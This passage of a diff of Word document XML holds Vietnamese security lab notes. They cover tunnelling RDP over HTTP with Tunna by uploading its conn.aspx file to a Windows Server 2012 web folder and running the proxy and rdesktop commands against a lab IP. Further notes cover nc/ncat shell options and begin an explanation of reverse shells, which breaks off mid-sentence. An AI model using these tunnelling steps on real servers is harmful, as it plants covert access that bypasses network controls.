+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>với</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>các</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>yêu</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>cầu</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> HTTP "GET" </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>và</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> "POST" </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>thuần</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>túy</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="2855595" cy="1104265"/>
+            <wp:effectExtent l="0" t="0" r="1905" b="635"/>
+            <wp:docPr id="1" name="Picture 1" descr="http://http-tunnel.sourceforge.net/common/dgram.gif"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1" descr="http://http-tunnel.sourceforge.net/common/dgram.gif"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2855595" cy="1104265"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Tunna</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bộ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>công</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cụ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sẽ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bọc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tạo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>đường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hầm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cho</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bất</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kỳ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>giao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tiếp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> TCP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nào</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> qua HTTP.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Demo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Tạo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>webservice</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trên</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> window server 2012</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Tải</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> them conn.aspx </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>( II</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">6 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> II8) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>của</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Tunna</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vào</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thư</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mục</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> web</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Sử</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Tunna</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>: python proxy –u https/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>/:192.168.21.139/conn.aspx</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> –l 4444 –r 3389 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t>v</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rdesktop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> localhost:4444</w:t>
+      </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
@@ -2214,7 +7482,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -2311,6 +7578,18 @@
     <w:name w:val="code-string"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:rsid w:val="0091416A"/>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="003635F1"/>
+    <w:rPr>
+      <w:color w:val="0000FF"/>
+      <w:u w:val="single"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>

--- a/demo/note.docx
+++ b/demo/note.docx
@@ -18,18 +18,20 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="Heading1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
+          <w:numId w:val="6"/>
         </w:numPr>
         <w:rPr>
+          <w:b/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
+          <w:b/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:t>Config</w:t>
@@ -73,10 +75,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="Heading1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
+          <w:numId w:val="6"/>
         </w:numPr>
         <w:rPr>
           <w:lang w:val="en-GB"/>
@@ -1440,31 +1442,47 @@
       </w:pPr>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+      <w:pPr>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>aspx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve"> :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId5" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://stackoverflow.com/questions/10182751/server-client-send-receive-simple-text</w:t>
-        </w:r>
-      </w:hyperlink>
+        <w:t>ncat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">( </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> )</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1472,14 +1490,12 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId6" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://www.youtube.com/watch?v=eFR93buUAFk</w:t>
-        </w:r>
-      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>kill -9 apt</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1492,7 +1508,7 @@
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>ncat</w:t>
+        <w:t>nc</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1513,7 +1529,7 @@
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>nmap</w:t>
+        <w:t>không</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
@@ -1521,7 +1537,21 @@
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve"> )</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> option – e)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1530,1131 +1560,1076 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>kill -9 apt</w:t>
-      </w:r>
+        <w:t>ncat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">( </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>không</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>có</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> option – e)</w:t>
+          <w:b/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>ìm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>hiểu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>về</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> reverse shell</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>ncat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Reverse shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>loại</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> session shell (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ngoài</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>còn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>có</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
